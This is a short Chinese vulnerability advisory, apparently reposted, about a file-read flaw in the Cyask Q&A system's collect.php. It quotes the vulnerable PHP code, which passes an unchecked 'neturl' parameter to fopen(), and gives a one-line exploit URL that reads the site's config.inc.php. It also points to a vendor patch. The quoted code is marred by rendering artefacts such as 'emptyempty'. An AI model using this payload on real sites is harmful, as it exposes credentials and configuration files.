cyask知道系统collect.php页面存在越权操作漏洞

2011-3-25 19:54:50 来源:网络转载 浏览:107
cyask知道系统collect.php页面存在越权操作漏洞
出现版本:Cyask系统

程序介绍: Cyask国内较为多人使用的仿百度风格的Ask系统。

漏洞分析: 从Collect.php代码当中可以看到
  1. else  
  2. {   
  3. /*  
  4. 检查网址  
  5. */  
  6. $url=get_referer();   
  7. $neturl=emptyempty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);   
  8.   
  9. $collect_url=emptyempty($neturl) ? $url : $neturl;   
  10.   
  11. $contents = ”;   
  12. if($fid=@fopen($collect_url,”r“))   
  13. {   
  14. do  
  15. {   
  16. $data = fread($fid, 4096);   
  17. if (strlen($data) == 0)   
  18. {   
  19. break;   
  20. }   
  21. $contents .= $data;   
  22. }   
  23. while(true);   
  24. fclose($fid);   
  25. }   
  26. else  
  27. {   
  28. show_message(’collect_url_error’, ”);   
  29. exit;   
  30. }   

漏洞利用: http://www.target.com/collect.php?neturl=config.inc.php

解决方案:
开发厂商:cyask
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.cyask.com
(0)
(0)